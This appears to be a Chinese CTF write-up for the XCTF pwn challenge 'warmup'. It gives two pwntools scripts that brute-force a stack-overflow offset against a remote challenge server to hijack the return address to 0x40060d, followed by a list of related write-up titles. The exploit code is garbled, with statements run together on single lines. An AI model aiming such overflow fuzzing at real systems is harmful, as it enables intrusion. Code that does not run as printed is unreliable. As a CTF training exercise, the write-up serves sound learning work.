CTF(pwn)攻防世界warmup

题目描述

这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧;

nc连接,给了目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下

from pwn import *
b = 0x40060d
for i in range(100):print(i)p = remote('111.200.241.244',49684)payload='a'*i+p64(b)p.recvuntil(">")p.sendline(payload)p.interactive()

得到了flag, 若P64() 没有得出答案的话,换成 P32再试一下;也可以设定适当的取值范围来减少时间;

也可以参考另外一种EXP比我这个复杂一点,但操作只有一步:

from pwn import *
b = 0x40060ddef fuzz(p, i, j):payload = 'a' * iif j==1:payload += p32(b)if j==2:payload += p64(b)p.recvuntil(">")p.sendline(payload)def main():for i in range(100):print(i)for j in range(1, 3):try:p = remote('111.200.241.244',45566)fuzz(p, i, j)print p.recv()   p.interactive()except:p.close()
main()

CTF(pwn)攻防世界warmup相关推荐

攻防世界warmup新人小白友好向详细解题过程
攻防世界warmup新人小白详细解题过程思路:查看网页源码发现提示信息,/source.php 进行代码审计 ,主要函数找出,PHP函数记住,自己构造PAYLOAD 声明:菜菜级的水平,解析有错的不 ...
[CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解
[CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解 _wakeup()及php序列化反序列化序列化字符串结构分析 _wakeup()的利用解题思路伪属性数 ...
[CTF/网络安全] 攻防世界 php_rce 解题详析
[CTF/网络安全] 攻防世界 php_rce 解题详析 PHP REC ThinkPHP V5漏洞Payload 姿势总结 PHP REC PHP RCE 指的是通过远程代码执行漏洞(Remote ...
forgot [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列13
题目地址:forgot 本题是高手进阶区的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先这个题目有很长的描述,但是都是废话,不去管他了. 照例下载附件,做下安全检查 ro ...
攻防世界-warmup详解
1.进入题目的场景只有一个表情,没有其他的信息,因此我们进行查看源码,发现source.php 2.访问source.php可以看的出来是代码审计因此我们需要对其代码进行了解 <?phphi ...
【和小白一起练习CTF】攻防世界：web基础练习题（2）
文章目录 1.simple_js 2.xff_referer 3.weak_auth 4.webshell 5.command_execution 6.simple_php 1.simple_js 题 ...
【web | CTF】攻防世界 wife_wife
目录步骤1:峰回路转步骤2:JavaScript原型链污染步骤3:fuzz测试总结:题目意义步骤1:峰回路转对英语无感的我一开始没看到有个注册的提示,还以为暴力破解,看了一下题目才知道不需 ...
【CTF】攻防世界如来十三掌
计算步骤: 先利用与佛论禅网站(http://keyfc.net/bbs/tools/tudoucode.aspx)将原有的文字转化为MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAen ...
【CTF】攻防世界 MISC 新手练习区 003-012详解
目录 003 如来十三掌 004 give_you_flag 005 stegano 006 坚持60s 007 gif 008 掀桌子 009 ext3 010 SimpleRAR 011 base ...

CTF(pwn)攻防世界warmup

题目描述

也可以参考另外一种EXP比我这个复杂一点,但操作只有一步:

CTF(pwn)攻防世界warmup相关推荐

最新文章

热门文章